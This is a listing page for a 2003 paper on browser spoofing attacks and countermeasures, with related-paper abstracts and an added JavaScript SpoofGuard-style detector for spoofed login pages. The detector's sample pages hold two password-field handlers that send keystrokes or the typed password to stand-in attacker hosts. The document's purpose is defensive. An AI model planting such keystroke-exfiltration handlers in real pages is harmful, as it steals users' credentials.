Trust on Web Browser: Attack vs. Defense

Authors

  • Tieyan Li
  • Yongdong Wu
Abstract

This paper proposes a browser spoofing attack which can break the weakest link from the server to the user, i.e., the man-computer interface, and hence defeat the whole security system of an Internet transaction. In this attack, when a client is misled to an attacker's site, or an attacker hijacks a connection, a set of malicious HTML files is downloaded to the client's machine. The files are used to create a spoofed browser including a faked window with malicious event-processing methods. The bogus window, having the same appearance as the original one, shows the "good" web content with "bad" activities behind it, such as disclosing the password stealthily. Once the attack is mounted, even a scrupulous user will trust the browser that is fully controlled by the attacker. We further propose several countermeasures against the attack.


Related sources

Client-Side Defense Against Web-Based Identity Theft

Web spoofing is a significant problem involving fraudulent email and web sites that trick unsuspecting users into revealing private information. We discuss some aspects of common attacks and propose a framework for client-side defense: a browser plug-in that examines web pages and warns the user when requests for data may be part of a spoof attack. While the plugin, SpoofGuard, has been tested ...
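The attack in the abstract above relies on a window that looks like the real login page while its password field carries event handlers that leak what the user types, and the SpoofGuard summary above describes the matching defence: a client-side check that inspects the page before the user hands over data. The following is an added example, not code from Li and Wu's paper or from the SpoofGuard plug-in. It models a SpoofGuard-style check over a simplified page structure ({url, forms[].action, forms[].inputs[].type/handlers}); the page model, the heuristics, the "same site" approximation and the three sample pages are all constructed here, and a real plug-in would walk the live DOM instead.

```javascript
'use strict';
// Added example, not code from Li & Wu's paper or from the SpoofGuard plug-in.
// A SpoofGuard-style static check: does the page, its password form, or the event
// handlers attached to the password field show the patterns a spoofed login window
// relies on? The page model and the sample pages below are constructed for this example.

// Inline handlers that fire per keystroke are how a spoofed password field can leak
// characters while the visible form still looks (and submits) like the genuine one.
const KEY_HANDLERS = ['onkeypress', 'onkeydown', 'onkeyup', 'oninput', 'onchange'];

function isIpHost(host) {
  return /^\d{1,3}(\.\d{1,3}){3}$/.test(host);
}

// Crude "same site" test: last two DNS labels (assumption; a production checker
// would consult the public suffix list, which this example deliberately avoids).
function site(host) {
  return isIpHost(host) ? host : host.split('.').slice(-2).join('.');
}

function hostOf(urlString) {
  try {
    return new URL(urlString).hostname.toLowerCase();
  } catch (e) {
    return null; // not a parseable absolute URL
  }
}

// Hosts referenced by absolute URLs inside handler source that lie outside the page's site.
function foreignHostsIn(script, pageHost) {
  const found = new Set();
  for (const m of script.matchAll(/https?:\/\/[^\s'"()]+/gi)) {
    const h = hostOf(m[0]);
    if (h && site(h) !== site(pageHost)) found.add(h);
  }
  return [...found];
}

// Returns every suspicious pattern found; score is simply the number of findings.
function analyzePage(page) {
  const pageUrl = new URL(page.url);
  const pageHost = pageUrl.hostname.toLowerCase();
  const findings = [];

  if (pageUrl.username) findings.push('URL carries a user@ prefix that hides the real host');
  if (isIpHost(pageHost)) findings.push('page is served from a raw IP address');

  for (const form of page.forms) {
    const passwordFields = form.inputs.filter(i => i.type === 'password');
    if (passwordFields.length === 0) continue;

    const action = new URL(form.action || '', page.url);
    if (action.protocol !== 'https:') findings.push(`password form submits over ${action.protocol}`);
    if (site(action.hostname.toLowerCase()) !== site(pageHost)) {
      findings.push(`password form submits to foreign host ${action.hostname}`);
    }

    for (const field of passwordFields) {
      for (const [attr, code] of Object.entries(field.handlers || {})) {
        if (!KEY_HANDLERS.includes(attr)) continue;
        const foreign = foreignHostsIn(code, pageHost);
        findings.push(`password field has ${attr} handler` +
          (foreign.length ? ` reaching ${foreign.join(', ')}` : ''));
      }
    }
  }
  return { score: findings.length, findings };
}

// Constructed sample pages; all hosts are documentation or reserved names.
const LEGIT_PAGE = {
  url: 'https://login.bank.example/',
  forms: [{ action: '/auth', inputs: [{ type: 'text', name: 'user' }, { type: 'password', name: 'pw' }] }],
};
// Classic spoof: user@ prefix hides an IP host, plain HTTP, keystroke handler on the password field.
const SPOOF_PAGE = {
  url: 'http://www.bank.example@203.0.113.7/login',
  forms: [{ action: '/collect', inputs: [
    { type: 'text', name: 'user' },
    { type: 'password', name: 'pw', handlers: { onkeypress: "new Image().src='http://203.0.113.7/k?c='+event.key" } },
  ] }],
};
// Quieter variant: HTTPS lookalike domain, same-site form action, but the handler ships the value elsewhere.
const LOOKALIKE_PAGE = {
  url: 'https://bank-example-secure.com/',
  forms: [{ action: 'https://bank-example-secure.com/login', inputs: [
    { type: 'text', name: 'user' },
    { type: 'password', name: 'pw', handlers: { onkeyup: "fetch('https://collector.example.net/k?v='+encodeURIComponent(this.value))" } },
  ] }],
};

if (typeof require !== 'undefined' && require.main === module) {
  for (const [name, page] of Object.entries({ LEGIT_PAGE, SPOOF_PAGE, LOOKALIKE_PAGE })) {
    const r = analyzePage(page);
    console.log(`${name}: score ${r.score}`, r.findings);
  }
}
```

The legitimate page produces no findings; the classic spoof page produces four (user@ prefix, IP host, HTTP submission, keystroke handler); the lookalike page produces a single finding, the handler reaching collector.example.net. Note what the lookalike case does not catch: the domain itself is never compared against a list of brands the user has accounts with, which is a separate heuristic the SpoofGuard summary alludes to and this example omits.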


Eradicating DNS Rebinding with the Extended Same-origin Policy

The Web’s principal security policy is the Same-Origin Policy (SOP), which enforces origin-based isolation of mutually distrusting Web applications. Since the early days, the SOP was repeatedly undermined with variants of the DNS Rebinding attack, allowing untrusted script code to gain illegitimate access to protected network resources. To counter these attacks, the browser vendors introduced c...


Preventing Web-Spoofing with Automatic Detecting Security Indicator

The anti-spoofing community has been intensively proposing new methods for defending against new spoofing techniques. It is still challenging to protect naïve users from advanced spoofing attacks. In this paper, we analyze the problems within those anti-spoofing mechanisms and propose a new Automatic Detecting Security Indicator (ADSI) scheme. This paper describes the trust model in ADSI in ...


Chapter 5 Anti-Phishing Phil: A Case Study in User Education

Phishing is a kind of attack in which criminals use spoofed emails and fraudulent web sites to trick people into giving up personal information. Victims perceive these emails as associated with a trusted brand, while in reality they are the work of con artists interested in identity theft [57]. These increasingly sophisticated attacks not only spoof email and web sites, but they can also spoof ...


Least Privilege 2.0: Access Control for Web 2.0 applications

Modern web sites make extensive use of scripting in the browser to provide a rich user experience. Further, these sites frequently put together content (including scripts) from different trust domains. Traditional models of access control which give the same level of privilege for all scripts on the browser are inadequate. Common web vulnerabilities such as cross-site scripting (XSS) and cross ...



Publication date: 2003